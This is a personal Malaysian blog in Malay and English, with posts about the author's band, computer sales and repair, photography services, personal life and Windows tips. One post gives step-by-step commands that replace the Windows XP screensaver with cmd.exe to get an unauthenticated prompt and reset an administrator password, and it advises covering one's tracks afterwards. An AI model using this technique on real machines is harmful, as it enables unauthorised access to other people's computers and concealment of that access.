Monday, November 16, 2009

Mari Download Lagu Southern Souls

Em...

Oklah hari ni aku ingat nak open link untuk sesiapa yang berminat untuk download lagu2 daripada band aku "Southern Souls".
Daripada biarkan lagu2 ni RIP,lebih baik bagi orang download.ada lah juga faedah kan.
So tema aktiviti hari ni adalah "Mari men-download lagu Southern souls sesuka hati sambil muntah2".


Hari ni aku sediakan 3 link dan 3 lagu iaitu lagu Cinta Jadi Gila,Anugerah dan Adakah Harapan untuk di downlaod.So apa lagi,download jelah.haha...


Cinta Jadi Gila.MP3

Anugerah.MP3

Adakah Harapan.MP3



P/S : Kalau tak sedap jangan complain2 okke.kalau best dengarlah banyak2 kali sampai muntah2.huhu..... : )


Boikot Fotopages.com

Emm masa aku tgh surfing sambil meng-update-kan iklan aku dkt fotomedia.com.my, aku terjumpa la pulak satu "thread" untuk memboikot fotopages.com.siap dengan banner skali.emmm.....fikir2 kan jelah ye......


Kalau nak tengok iklan aku sila klik sini >>>>>>

Monday, November 9, 2009

How to Hack a Window XP Admins Password

This is a cool little trick I’ve got it from my friend and decided to share it with you fine and ethical individuals =). Log in and go to your DOS command prompt and enter these commands exactly:

cd\
cd\windows\system32
mkdir temphack
copy logon.scr temphack\logon.scr
copy cmd.exe temphack\cmd.exe
del logon.scr
rename cmd.exe logon.scr
exit

So what you just told windows to backup is the command program and the screen saver file. Then you edited the settings so when windows loads the screen saver, you will get an unprotected dos prompt without logging in. When this appears enter this command that’s in parenthesis (net user password). So if the admin user name is Blade and you want the password 1234 then you would enter “net user Blade 1234? and now you’ve changed the admin password to 1234. Log in, do what you want to do, copy the contents of temphack back into system32 to cover your tracks.

Saturday, November 7, 2009

Video Kutuk Dato’ Sri Siti Nurhaliza

Masa aku tgh belek2 youtube,jumpa la pulak satu video lelaki2 yang "setengah keras" tengak dok kutuk mengutuk Dat'o Sri Siti Norhaliza dgn tajuk "Interview Exklusif Datin Sri Rahayu & Datin Sri Siti Nurhaliza"
Buat masa ni rasanya belum ramai lagi yang tengok sebab rating viewers baru mencapai 30,944 orang.Tapi aku pun peduli apa sebenarnya.Yang penting video ni memang Macam Haram!!!




p/s: eee geli2 ketiak aku tengok video nih......

Tuesday, November 3, 2009

Kelisa Putih (mesti baca)

Cerita ni aku jumpa dkt carigold.com - by Lifeis@Mess
mcm Haram!!
Pada suatu malam yang hening dan sunyi di lebuhraya utara selatan (PLUS highway) kelihatan sebuah Kelisa putih tersadai di sebelah lane kerosakan. Ada orang tua yang berdiri disebelahnya, pemilik Kelisa tu sedang berjalan kehulu kehilir cuba menahan kereta supaya membantu tetapi tidak ada sebuah kereta pun berhenti. Tiba- tiba datang lah sebuah kereta Mitsubishi Evo 7 berhenti di sebelah Kelisa tadi.

"Ada apa nie pakcik,kereta rosak ke?"tanya mamat Evo 7 berusia dalam lingkungan 20an.

"A'ha rosak "jawab pakcik tu simple je.....

"Ok, cam nie, saya ada tali nanti saya ikat kat kereta saya dan saya tarik kereta pakcik sampai tol"mamat nie bagi idea.

"canteek gak tu..." tapi....nanti kalau pakcik rasa awak bawak laju pakcik akan hon dan bagi high beam"

"Woraaitt pakcik"..mamat nie pun ikatlah tali kat depan Kelisa putih didepan dan hujungnya diikat dibelakang bumper Evo 7nye. dia pun jalanla..dengan slow dan berhati-hati. Dalam lima kilometer mamat nie laju le sikit, maklumlah Evo 7 brother….apalagi pakcik tu pun hon dan bagi high beam la kat mamat tu. Mamat tu pun slowkan balik..

Tiba-tiba ada sebuah Porsche 911 datang dari belakang dan press minyak kat mamat Evo7, apa lagi bro….jiwa muda pantang dicabar,
dia pun tekan la minyak rapat nak kejar Porsche 911 nie...lupa la pulak dia dengan Kelisa putih org tua yg diikat kat belakang kereta dia.

Orang tua tu punya la hangin satu badan,dia pun hon dan bagi hi beam bagai nak rak. Mamat evo7 tu dah tak sedar dah….angin punya pasal.
Tak sampai 2 kilometer di depan ada mamat Polis bertenggek buat speed trap kat bawah jambatan.

Vrooommm.... bedesup peginye.

"Ini dah lebih speed limit nie"kate mamat Polis nie.

"Mak ai !! ini dah cecah 250kmj" Dia pun contact la kengkawan dia kat depan supaya saman kereta-kereta yg laju nie....

"Over..over. ..over"kate mamat Polis tadi pada kawannya didepan.

"Ada tiga buah kenderaan memandu melebihi had laju,sebuah Porsche 911, Mitsubishi Evo7 dan sebuah lagi kalau aku cakap korang mesti tak
percaye punye" kate mamat Polis.

"Kereta ape yang satu lagi Bro" kate member Polis yg ada di depan.



"Kelisa putih beb….tengah cucuk angin ngan Evo7 tu….siap bagi hon dan hi beam nak potong !!! pergh…

Sunday, November 1, 2009

Kecewa Yang Sangat2 Super!!!


Emm.. betul2 sangat2 super kecewa...

Kedai yang aku mohon untuk disewa selama ni nampaknya tidak kesampaian.Kedegilan dan ke-kejian penyewa lama (dahlah tak bukak kedai,tapi masih bayar sewa dan xnak lepaskan pulak.BONGEK!!!) untuk menyerahkan kedai kepada aku nampaknya amat sukar dan kurang harapan.Segala plan yang aku buat selama ni nampaknya terpaksalah ditangguhkan sehingga aku betul2 mendapat lokasi dan kedai yang sesuai untuk menjalankan projek yang telah aku rancang selama ni.

AKU BETUL2 SANGAT SUPER MENYIRAP LIMAU LA!!!!!!!
XBOLEH ANGKAT SIOT!!!!!!!!

So......
hari ni aku telah pergi meng-interview-kan diri aku di salah satu syarikat yang agak terkenal jugaklah di Malaysia ni.Masa interview tu dia suruhlah pilih jawatan,so aku pilih jelah bhg Engineering.Apa yg berlaku petang tadi nampak gayanya mcm ada harapan yang tinggi dan mcm menjadi.Tapi untuk memberikan offer gaji yang aku mintak,pihak HR mcm seram2 sejuk jek (emmm...tapi manager dia mcm ok la pulak xda masalah ).
Tengoklah mcmana nanti.kalau next week diorang panggil,aku ingat aku go jelah kerja dulu.gaji pun lumayan,cuma aku masih still nak buat projek yang aku dah lama plan sebelum nih.

Apa2 pun harap2 aku dapat berjaya satu hari nanti dan menjadi kaya.hahah...

Amin....

Saturday, October 31, 2009

PayPal supports Ringgit Malaysia (RM) – It’s Official!




Finally,there is way to transfer PayPal Funds to Malaysia Ringgit(RM) to Maybank or other bank in Malaysia.convert them to RM by withdrawing them to your local bank account directly. Instructions here.

What are the implications for Malaysia Merchants (and the new countries PayPal starts supporting?). We cannot predict the future, but for every new market which PayPal enters, normally the e-commerce activity will spur as it has become really easy for businesses (esp small businesses) to start accepting online payment and thus making e-commerce a very practical and attractive channel for them to expand their businesses.

In the eye of PayPal, Malaysia has been perceived as a favorite cross-border trading (aka export) and our English based speaking crowd is seen as an advantage (when it comes to product content, still, need to sort out on “what to sell”). Will we live up to the expectation? Well, time will tell.

info source :
http://www.webshaper.com.my/blog/index.php/paypal-supports-ringgit-malaysia-rm-its-official/

Friday, October 30, 2009

GUITARTALK



"The one I've got in my hand at any particular time."
— Keith Richards on his favorite guitar

"Pain or romance. That’s what I do with the guitar. I don’t do scales. I either make it sound like it’s in pain or in love."

— Dick Dale

"I don't read music. I don't write it. So I wander around on the guitar until something starts to present itself."
— James Taylor

"The two of us even look alike. My musician pals haven't carved and written their names on me the way they have on Trigger but we're both pretty bruised and battered."
— Willie Nelson in his book "The Tao of Willie"

"An uncle of mine emigrated to Canada and couldn't take his guitar with him. When I found it in the attic, I'd found a friend for life."

— Sting

"I have a guitar made out of a 2x4 that I bought in Cleveland. You know, in Iraq, you can't have a guitar in the window of a music store because it's too sexy. You know, the curves. so I could go over there with these 2x4 guitars and really take the country by storm."

— Tom Waits

"There’s so much that can be done on the guitar. And that’s what is so good about the guitar — everyone can really enjoy themselves on it and have a good time, which is what it’s all about. Right?"
— Jimmy Page

"If I look like a good guitar player it's because that's my whole thing — to look like I'm playing the guitar — but really I'm not."
— Pete Townshend in 1968

"Once I found the guitar, I had the key to the highway."
— Bruce Springsteen

"To me a guitar is kind of like a woman. You don't know why you like 'em but you do."
— Waylon Jennings

"First guitars tend to be like first loves: ill-chosen, unsuitable, short-lived and unforgettable."
— Tim Brookes in "Guitar: An American Life"

"I started taking guitar lessons when the Brooklyn Dodgers left Brooklyn. I was so depressed, so my parents bought [me] a guitar."
— Neil Diamond

"If something is too hard to do, then it's not worth doing. You just stick that guitar in the closet next to your shortwave radio, your karate outfit and your unicycle and we'll go inside and watch TV."
— Homer Simpson




Wednesday, October 28, 2009

Create One-Click Shutdown and Reboot Shortcuts

First, create a shortcut on your desktop by right-clicking on the desktop, choosing New, and then choosing Shortcut. The Create Shortcut Wizard appears. In the box asking for the location of the shortcut, type shutdown. After you create the shortcut, double-clicking on it will shut down your PC.

But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:

shutdown -r -t 01 -c "Rebooting your PC"
Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message "Rebooting your PC." The shutdown command includes a variety of switches you can use to customize it. Table 1-3 lists all of them and describes their use.

I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:

shutdown -s -t 03 -c "Bye Bye bladefingers!"
shutdown -r -t 03 -c "Ill be back bladefingers ;)!"

Switch
What it does

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn
Indicates the duration of delay, in seconds, before performing the action.

-c "messagetext"
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.

-f
Forces any running applications to shut down.

-r
Reboots the PC.

Kedai Oh Kedai


Dalam masa terdekat ni aku masih lagi berbincang utk membuat keputusan untuk membuka satu kedai specialist menjual,membaiki notebook dan komputer direct kepada customer.
konsep yg paling baik adalah,customer tak perlu tunggu lama(kopek dan repair depan2 customer juga..hehe),harga yg tetap(fix price),servis yang baik,barang yang murah dan berkualiti,bla...bla..bla...

Harap projrk ni dapat berjalan lancar dan tiada gangguan yang tak disangka2.So kalau projek menjadi lepas ni,jumpa aku di kedai yang akan diberitahu lokasinya kemudian.

Doakan gua okey!!

Chao...

Saturday, October 24, 2009

Thank you NAZA !!!

Yesterday,the purchasing department of Naza Hotel call me to collect the P.O from them.
So today i just come and collect the P.O's and waiting for the green light to supply and do some installation job.
Thanks for choosing my quote me and hop to do more business in future.

Thanks Naza...thanks 4 your business...

Its kinda weird but its true.......

No idea for my new post.no have time for story tellin.
But someone just give me this idea several hours ago.
so i have this wicked idea....
but pakai nama samaran sahaja...


Instant messages are being archived on this computer.

View Full Archive (Alt+Shift+V) Archiving Preferences (Ctrl+Shift+P)

Makcik: hi

Pakcik: hi juga

Makcik: sibuk ke?

Pakcik: tak juga

Pakcik: adalah sikit2 kerja

Makcik: owh.. ok.. sorry to disturb u then

Pakcik: em its ok.no prob

Makcik: i hope u dont blog about this too yea. hopefully

Pakcik: blog??

Makcik: yeap

Pakcik: anything wrong bout ma blog meh?

Pakcik: ada yg xkena?

Makcik: nothing. hopefully tak akan jadi topic utk blog u tu lagi. and i am sorry for not answering ur previous question..

Makcik: here's the answer: im doing good. tq

Pakcik: maybe...

Pakcik: but this conv is extremely interesting..

Pakcik: no need to say anythin.always knowin ur doin good all the time..

Makcik: then, u suggest that we shud end it?

Makcik: r u copying all of this?

Makcik: hahaha

Makcik: m kidding

Pakcik: nope

Pakcik: but never thought of that

Pakcik: interestin....

Pakcik: such an idea

Makcik: intentionally asking me u say my fav phrase.. still sarcastic you!

Makcik: u always have been u know that

Pakcik: if its in your mond,it will always be.

Pakcik: if not,it will never be.

Pakcik: im nobody to judge people.u always the person ive ever know.

Makcik: i didnt get u?

Makcik: anyways, hows ething with u? good?

Pakcik: cuma ayat2 pelik n mengarut je

Pakcik: forget it

Pakcik: stil the sarcastic me..

Makcik: anyways, u r not answering me.. how r u n ething?

Pakcik: em how to say..

Pakcik: happy..

Pakcik: ok?

Pakcik: u?

Makcik: same i guess.

Makcik: anyways, m sorry, i gotta grab my dinner before i catch my flight..

Makcik: so i guess we talk soon

Makcik is typing a message.

Makcik: take care.

Pakcik: flight??

Pakcik: em okey.

Pakcik: take care.



thats all...
Nothin special.just conversation that we never have before or what i can say that its more than 100 words....
the one n only person in the world claim that I'm the sarcastic person.(maybe dia tgk cerita mat salleh yg jumpa hantu girlfriend dia tu kot.ntahlah tajuk pun dah lupa.

we never had long conversation like this before.
makes me wonder why.its kinda weird.......huhu :)




Wednesday, October 21, 2009

Photo Paper 4x6 (3R) cheap sale!!!!

HP Photo Paper Premium,Hi Gloss 4x6,1000 sheets

Size: 4x6 (3R)

Price:RM120 thumbup.gif

Packaging Condition:
Original Packaging
1000 sheets per case (wrapped in plastic inside)
2 partition in 1 box
Hi-Gloss Premium Plus Photo quality
design to prevent no thumb print mark
Can print using Ink jet or Laser Jet Printer


Weight: 4.6kg

Dealing method: Pos Laju
1kg = RM8
4.6kg = RM35


Payment: Maybank2u/PayPal
My Maybank Acc :
Name: Mohd Fairuz
ACC NO: 151128156244
Email/PayPal : bladefingers1@yahoo.com

Contact method/details: Email/YM me biggrin.gif

Item conditions: NEW in box thumbup.gif

Stock Availability: 50 boxes brows.gif

Reason for sale: Clearing Stock whistling.gif


Serious buyer are welcome!!!!(>2 boxes, price negotiable)


Saturday, October 17, 2009

Rock n Roll All Night

Band Rock n Roll Yang Paling "Boom" dan 'gempak" satu dunia.....
Firs time aku tgk 'The Kiss" masa aku mula2 start main muzik,tergamam beb.Apa taknya...main rock n roll je tapi dress-up mengalahkan black metal.

Tapi zaman tu memang rock n roll lah muzik yg paling ganas dan gempak,so x boleh nak kata pa lah.
So, lets Rock n Roll All Night.....

Task Manager - Enable

Haa ni dia.......
So.. this is the registry to enable Windows Task Manager. (tested already with Win XP & 2000)
Don't ask me again okay.
Please ye........

START - RUN -
type "regedit" in the box


Hive: HKEY_CURRENT_USER
Key: Software\Microsoft\Windows\CurrentVersion\Policies\System
Name: DisableTaskMgr
Type: REG_DWORD
Value: 1=Enablethis key, that is DISABLE TaskManager
Value: 0=Disablethis key, that is Don't Disable, Enable TaskManager

Jangan tanya yg pelik2 boleh tak???
tanyalah pasal mcmana nak buat kotak2 atau anak panah dkt ms words ke???
huhuhu..

Friday, October 9, 2009

Malaysia,Korea vs Indon,North Korea

...
See what i found in my mail box.
It was send by my "bro" last week
Peace brother.....Peace......

Add Image

owhh letihnya gua....

Aku kurang tidur nampaknya akhir2 ni.
banyak laptop rosak n PC yang nak kena siapkan.customer bnyk bising2 nak cepat.tapi bila dah siap,Haram!!!! tak muncul.
Bilik aku pun dah mcm serabut,bersepah (tak lah bersepah sgt.tapi kurang pengurusan jek)
Lagipun aku ada ada satu projek MEGA dengan kawan baik aku.Banyak benda nak kena buat,banyak duit nak kena keluar...
uhuk..uhuk...
semput...semput....
Sakit otak,perah2 idea samapi kering.
harap2 aku tak mati awal sudah.......................

Monday, September 28, 2009

Blog post Hari Raya yang sangat2 Lewat.hahaha

hi,
Apa dah jadi?????
Raya dah masuk berapa hari dah nih???
tapi masih sempat
hehe

Selamat Hari Raya kepada semua rakan,saudara ataupun sesiapa di luar sana.
Harap maafkan saya zahir dan batin.
Salah dan silap saya harap dapat di maafkan sekiranya ada yang sengaja ataupun tidak.
Maafkan saya.....

Ok busy sgt ke aku ni sampai tak sempat nak tulis blog..
tak penting ke blog aku ni?
Wajarkah aku biarkan blog ni terbengkalai?

Emm.. nampaknya aku dah menjadi orang yang terlalu busy dalam bulan ni sampai takda masa luangkan diri membuat statement2 terbaru.haha

Tapi Alhamdulillah....
syukur sgt2 kepada Allah,dalam bulan lepas hingga hari ni rezeki datang bertimpa2 yang membuatkan aku terasa betapa besarnya kekuasaan Allah dan betapa pemurah-Nya dia pada diri aku yang sangat2 kecil dan tak seberapa ni.
Segala project yang dirancang menjadi dan bertambah2 rezeki yang datang.(ntah mcmana boleh ramai orang yg aku tak kenal datang cari aku bagi project.sgt pelik la????)
Jika ada rakan2 yang perkenalkan aku betul2 sangat berterima kasih.
***tapi janganlah tiba2 datang claim pada aku mintak percent pulak...huhuhu****

Harap2 project aku yang terbaru untuk menghantar laptop ke Indonesia berjaya kali ni.Dan kepada sesiap yang nak beli laptop murah2 atau nak hantar repair laptop yang rosak,sila lah contact aku ye :) (teruknya siap promote pulak) Jangan takut.aku takkan caj mahal2 punya.setiap kerosakan tak kira apa shj,fix price takkan lebih dari RM450 jek okey.Kalau nak bukak Cybe Cafe atau nak beli PC baru atau terpakai dalam volume yang banyak pun anda akan di layan dengan harga paling murah da silalah meminta quotation anda di bladefingers1@yahoo.com

so itulah dia posting raya yang sangat lewat dan membuat kan diri aku betul2 malu..hehe
apa2 pun selamat hari raya....


P/s : pecah kaca pecah gelas,
sudah baca,baca jelah xyah nak buat apa2 pun.....

Tuesday, September 15, 2009

Owhhh bosannya......

owhhhh bosannya hari ni...

tu je aku nak tulis hari nih...xda mood lah..

x boleh???????????

Thursday, September 3, 2009

Aku dan Nunchaku....

hari ni aku nak cerita sikit pasal salah satu daripada hobi aku....
Nunchaku...
ye nunchaku...apa itu nunchaku????
ia adalah sepasang kayu atau besi yang mempunyai rantai atau tali yang bersambung di antara kedu2nya...


Oklah mcm ni.pernah t engok cerit a bruce lee??
nunchaku ni adalah senjata yang sinonim dengan bruce lee....
yesssss betul,kayu bruce lee.pandai pun!!

so bila tgh tgk2 file lama dlm pc nih,ter perasan pulak video yang di ambil oleh adik aku boboy masa aku tengah bermain2 dengan benda alah ni masa awal tahun ni juga.
Lama juga aku mula bermain2 dengan nunchaku nih,sejak dari aku sekolah dulu,tapi aku tak pernah tunjuk pada rakan2,termasuk juga kepada rakan2 baik dan mereka tak pernah pun tau yg aku ni boleh mengendalikan nunchaku dan pernah menjadi tutor kepada peminat2 benda alah nih.

dah lama juga tak pegang benda alah ni so ada lah sikit2 terkucil.huhu

Iron nunchaku - Double
video

Iron nunchaku -single
video

So itulah video2 terkucil sebab dah lama tak training.apa2 ilmu pun kalau tak di amalkan akan semakin tumpul dan hilang kemajiran.
Kalau siapa2 yang memerlukan personal tutor untuk nunchaku arts ni,bolehlah contact aku okey..
Tapi bagi siapa2 yang lebih mahir tu,sila lah beri tunjuk ajar ya..


P/S : kalau agak2 bolah menang tak kalau aku lawan dengan sifu Bruce Lee???huhu


Core2Duo untuk di jual......Paypal untuk di beli....


Hi,

Hari ni aku sangat sibuk betul lah.boleh dikatakan hari yang paling busy lah dalam bulan nih...
Hari yang sangat memenatkan dan membuatkan tulang aku mcm nak tercabut jek.hehe..

Untuk minggu ini,aku telah berjaya menjual 6 set komputer AMD hi-spec yang telah ditempah oleh sebuah cyber cafe di kota tinggi yang ingin digunakan bagi online game di cc beliau dan tadi aku juga telah berjaya menjual sebuah notebook hp Core2Duo kepada pelanggan yang sama.so.. kerana kerjasama yg lancar minggu ini,minggu depan beliau ingin menempah 6 set LCD screen.Alhamdulillah....

Nak di jadikan cerita,aku sekarang nih ada 4 complete set desktop komputer siap LCD 15" dengan processor Core2Duo yang hendak di jual.Bagi sesiapa yang berminat,bolehlah mail pada aku bladefingers1@yahoo.com atau sms +60177570297 untuk mendapatkan maklumat lanjut serta harga borong semperna Hari Raya untuk barang tersebut....

Lagi satu...
untuk sesiapa yang ingin "trade" PayPal mereka kepada Ringgit Malaysia,bolehlah juga email atau sms kepada aku okey...paypal anda amat di kehendaki!!!
tapi jangan jual mahal2 sudahlah ye..huhu....

So... tu jelah untuk hari ni,dan kepada semua umat Islam,aku ucapkan selamat berpuasa dan selamat berniaga..hehe..

cabuttttt.......


P/S : bg sesiapa yang tak puasa tu kira tak selamatlah kan??
hehe


Monday, August 31, 2009

Southern Souls at REVERBNATION....


Join us at "reverbnation"

http://www.reverbnation.com/southernsouls

Southern%20Souls

Thanks 4 supporting us!!!








Quantcast

30 Ogos yang membuatkan darah aku naik........merepek..

kenapa?????
memang satu soalan yang sesuai....
tau apa dah jadi hari nih???
bergaduh..
em..ye bergaduh tapi bukan dengan tangan tapi dengan mulut.

Alhamdulillah,hari ni aku telah berjaya "settled" satu job dengan begitu cemerlang dan menguntungkan lah juga.aku juga telah dapat meyakinkan customer aku untuk meneruskan lagi kerjasama dan mendapat lagi tender yang baru...Alhamdulillah...
Tapi yang membuatkan aku naik darah hari ni adalah merupakan mulut orang..ye mulut orang.
Manusia nih,bila dah tak suka(tak taulah kenapa) memang akan mula cari pasal,sakit hati dan sakit mata bila kita berada di depan mereka.setiap apa yang kita buat akan menjadi suatu perkara yang tak kena dan menyakitkan hati.kadang2 kata2 yang tak perlu,tak logic dan tak masuk akal akan dikeluarkan dengan tujuan menyakitkan hati tanpa bertanya atau usul periksa.
biasalah manusia....mata ni memang jahat.hati lagilah,memang kalau kotor pun tak nampak.

Lagi satu hal,bila kita mula cakap dengan cara perlahan...
makin menjadi.tujuannya bukan apa,kononnya buat2 tak tau jela..hehe

Bila dah mcm nih...mula lah kita cakap secara halus dan menyindir..........
Tau apa terjadi???

MELETUP!!!!!

Yes..meletup beb.tak tahan kata2 halus......kelakar.....
biasalah orang tak nak kalah.manusia mcm ni memang ramai dalam dunia nih.
jenis yang bercakap tak nak kalah.bila kita buat kerja depan mata..contohnya pasang kompter ke..repair komputer atau barang elektronik,dia pun cakaplah yg dia pandai,dia pengalaman bertahun2 bahagian PCB lah ntah apa lah yang mencarut2 pun aku tak tau.tapi tak juga buat demo ke,tips2 masuk akal ke.tapi statement yang keluar ntah apa2 ntah aku pun kesian jugak kadang2 tgk orang mcm nih.sedangkan di tau nih..yang aku ni Engineer.Engineer elektronik tau,bukan kerja cleaner kilang elektronik.huhu...
(kelakar tau bila kita dalam situasi nih..haha)

Tapi biasalah aku...mengalah dengan muka buat2 mcm orang bodoh je buat kerja .yang penting tangan bergerak,kerja jalan dan siap tanpa perlu membazir masa.

Ok berbalik kepada cerita tadi...
bila dah meletup..apa lagi..mula lah ajak aku berperang mulut.aku biasalah..cakap tegak je xda tapis2 bila dah mcm nih.
tapi mcm biasalah...kata2 orang tua,bila benang dah basah masih nak cuba ditegakkan..
hum...xbolehlah nak kata apa..dengar dan layan kepala jelah.hehe layan bertekak....
Biasalah..manusia kalau dah ada sifat membenci dan pilih kasih,kita cakap apa pun tak laku lah jawabnya.hehe

Kebiasannya dalm hidup ni,duit pun menjadi isu utama.
biasalah..manusia kalau tak ada duit siapa yang suka.tak ada.tapi manusia yang banyak duit,kita akan sanjung,agung2kan, dan sayang2 dan segala kesilapan yang dilakukan depan mata hari2 selama bertahun2 tak akan menjadi masalah kerana hati manusia memang mudah di beli dengan wang ringgit dan wang ringgit ini dapat menutup mulut dan mata bagi sesiapa yang lemah dan menganggap wang ringgit adalah segala2nya dari yang lain.Ada juga orang yang menolong orang lain menggunakan wang ringgit untuk menunjukkan yang dirinya mulia,bertanggungjawab dan terpuji sedangkan dirinya merpukan orang yang hidup berpura2 dan hidup dalam khayalan dan tiada tanggungjawab kepada orang yang lebih memerlukan.
Orang yang mempunyai duit banyak dianggap sebagai orang yang baik,paling bersopan,paling beradab.sedangkan cara hidup meraka sebenarnya seperti binatang dan kita tidak pernah tahu dan mengambil tahu.

Berbalik lagi kepada cerita tadi.....
yang buat aku kelakar tau tak pergaduhan ni pasal issue apa??
pasal isu customer.
Customer yang datang beli komputer AMD 6 set siap LCD dan sebijik laptop.
Customer yang aku baru kenal tu datang atas urusan berniaga dengan aku tu dia kata tak menghormati beliau dan aku dimarahi dengan kata2 tuduhan yang menyakitkan hati mengatakan kawan2 aku tak menghormati beliau....dan tak tau menghormati orang lain.

Dan terjadilah peperangan mulut yang tak sepatutnya berlaku dan tak akan berlaku jika manusia mempunyai akal fikiran dan bertanya sekiranya ada2 perkara yang tidak faham dan mengelirukan.

Aku pun tak faham kenapa masalah orang kita nak sibuk2.
Aku pun tak faham kenapa sikap dan sifat orang kita nak pertikaikan sedangkan kita tak pernah nak cuba perbaiki sikap kita sendiri.
Aku pun tak faham kenapa kita mesti ada sikat membenci orang yang tak mendatangkan masalah kepada kita.Kita ni cuma manusia biasa.bukan raja atau tuhan...
Aku pun tak faham kenapa dalam perniagaan yang dia tiada kena mengena tapi masih nak masuk campur dengan cara yang merepek dan kelakar nih.

Dan Aku pun tak faham kenapa dia sendiri tak menegur orang tarsebut,tetapi menjadikan aku yang tak tau apa2 ni sebagai kambiing hitam untuk memuaskan nafsu amarah beliau.

Sedihhhh......................................................................................................
Bila aku fikir2 balik..teringat aku pada kawan2 yang banyak berjasa dan menolong aku selama aku hidup susah dan senang...
Baru aku sedar selama nih aku memang menghabiskan hidup dengan kawan2 dan hidup aku hari ni semuanya berkat dari kawan2.kalau tak ada kawan2,entah mcmana aku sekarang.

Selama aku study dulu..kawan2 yang tolong masa susah.aku kerja sambil belajar untuk menampung kos pelajaran yang tinggi yang tak mampu ditanggung keluarga.malam kerja kedai makan jadi tukang masak,hujung minggu kerja kontrak bancuh simen sampai tangan terkopek2,repair komputer dkt cyber cafe dan macam2 lagi.Bila takda duit..kawan tolong.bila susah...kawan tolong.bila ada apa2 masalah..kawan tolong....

Ntahlah aku pun tak tau mcmana hidup aku akan datang.apa yang akan terjadi aku pun tak tau.
jalan terus...je.....


P/S : ni merupakan cerita mengarut aku hari nih.selamat menyambut hari kemerdekaan....huhu...Merdeka!!Merdeka!!!Merdeka!!!!

Thursday, August 27, 2009

Cinta Jadi Gila By Southern Souls is on air RIA 89.7

Cinta Jadi Gila By Southern Souls (S'pore, Malaysia) is on air RIA 89.7 siape suka request, siape tak suka request bnyk2 k...Thank you..

permintaan lagu di talian +65 66911897
laman web RIA FM: http://www.ria.sg

http://www.ria.sg/index_traxx.htm
Thanks RIA FM
Thanks 4 supporting us!!...


**untuk Syahnan a.k.a Tawau,tahniah! sebab lu dah jadi bapak.lu diam2 je eh tak info gua.anak lelaki eh..

selamat berbahagia bro!!

http://www.myspace.com/southsoulz

Professional Photographer in the house....

okey..dah lama nampaknya aku tak menulis dalam blog yang tak seberapa nih.
buat masa nih aku tengah sibuk menerima tempahan untuk menyiapkan beberapa set komputer daripada 3 orang yang berbeza yang ingin membuka cawangan cyber cafe di sekitar johor bahru dan kota tinggi.agak busy jugaklah meyiapkan quotation dan kerja2 menyiapkan permintaan yang ada.

sekarang nih aku baru teringat yang aku sebenarnya menyediakan khidmat juru foto professional untuk mengambil gambar.tak kira perkahwinan atau apa2 pun majlis2 yang lain yang memerlukin perkhidmatan mengambil gambar.

Sebelum ini aku berkerjasama dengan kawan sekelas aku masa study dulu yang dah menukar profession beliau daripada bidang engineering kepada bidang fotografi sepenuh masa.memang tak sangka betul.
kalau nak tengok hasil kerja beliau,bolehlah tengok sendiri dkt laman blog dia http://syahnann.fotopages.com/

emm memag sangat berbakat!!!!
tapi sayang dia dah tak tinggal JB lagi.Dah balik kampung halaman dekat Tawau,Sabah.so dah tiada kerjasama lagi antara kami melainkan SMS jelah.

ok,untuk khidmat fotografi,aku caj RM150-180 bagi satu role (36 keping)
untuk saiz2 lain dan kehendak2 luarbiasa daripada pelanggan contohnya untuk aku menyediakan buku dan frame yang berlainan jenis,bolehlah contact aku dkt email aku bladefingers1@yahoo.com ataupun call +6017-7570297 dan kita boleh berbincang okey.

apa2 pun nanti aku akan cuba buat la iklan2 yang patut ataupun try buat banner yang bling2 ke untuk cuba menarik minat pelanggan.oooo tak lupa jugak,gambar memang siap edit dan buat sedikit make over.biasalah biar nampak 10x lebih cantik dari yang asal.

chaoo!!!


PS: biasalah...cari makan...

Tuesday, August 4, 2009

Manga dan drama Jepun

apahal pulak!!!
ntahla....
aku pun tak taulah apa kejadahnya pulak sejak akhir2 ni aku jadi kemaruk balik nak ulang2 tengok manga dgn drama bersiri jepun yang aku dah simpan lama2.dah mcm buang tebiat jugaklah nampaknya.time ni lah jugak kawan2 "sekapal" aku masa dulu2 (masa zaman2 kemaruk baca comic)mula menghantar link2 manga dan comic yang ada secara online.

tak payah la beb..aku pun tau nak search menatang2 ni dkt internet nih.search je dkt yahoo ke..google ke..mesti jumpa punyalah.tapi mcmana pun aku masih berterima kasih kepada diorang nih kerana masih lagi mengambil berat pasal aku walaupun aku selama ni dah membawa jalan hidup menyendiri dan kurang bergaul dengan kawan2.

aku juga harap tahun nih dapat mengubah diri aku menjadi orang yang lebih baik dan lebih sayang pada kawan2.lagilah dah nak dekat bulan Ramadhan nih.harap kawan2 semua dapat memaafkan segala silap dan salah yeng mungkin aku telah buat selama ni secara sengaja atau tidak senga.

harap dapat hidup lebih bersemangat,aman dan damai tahun nih...

ganbatte!!!! (dalam bahasa jepun bermaksud "berusaha!!!!)

Monday, August 3, 2009

Demam......

ok..
hari ni aku memang taknak langsung cerita pasal band aku southern souls..
sebab?????
emm memang soalan yang sangat bagus!!!
sebabnya aku demam.sakit kepala,sakit badan dan senag cerita semuanya sakit2 yang membuatkan aku mengalami mood yang tak berapa baik.

Ni pun dah lama rasanya aku tak update dan post apa2 dalam blog aku nih.so hari ni merupakan lembaran baru bagi aku dalam bulan Ogos ni untuk menulis dalam blog yang tak seberapa nih.
so... untuk bulan yang mendatang ni aku harap mendapat rezeki yang banyak dan kesihatan yang baik untuk aku berusaha lebih gigih lagi.

doakan ya!!

chaooo!!!

Tuesday, July 21, 2009

Upload Lagu

ok hari ni aku selesai meng-upload lagu tersebut di myspace.
untuk mendengar lagu tersebut sila ke website myspace southern souls :
http://www.myspace.com/southsoulz

dan jangan lupa untuk mengundi (vote) setiap hari di hot fm prelude:
http://www.hotfm.com.my/hotfm_prelude.asp

terima kasih...

Monday, July 20, 2009

Cinta Jadi Gila di Hot Fm Prelude...

Lega..........
akirnya lagu Southern Souls"cinta jadi gila" Telah di-list kan di dalam segmen Hot FM Prelude dan ke udara setiap malam dari pukul 11 hingga 12 malam.
Tapi yang masalahnya aku masih tak tau kalau lagu tersebut diterima oleh semua lapisan masyarakat atau tidak.entahlah aku pun tak tau sama ada ada orang yang akan vote atau tidak untuk lagu tersebut.

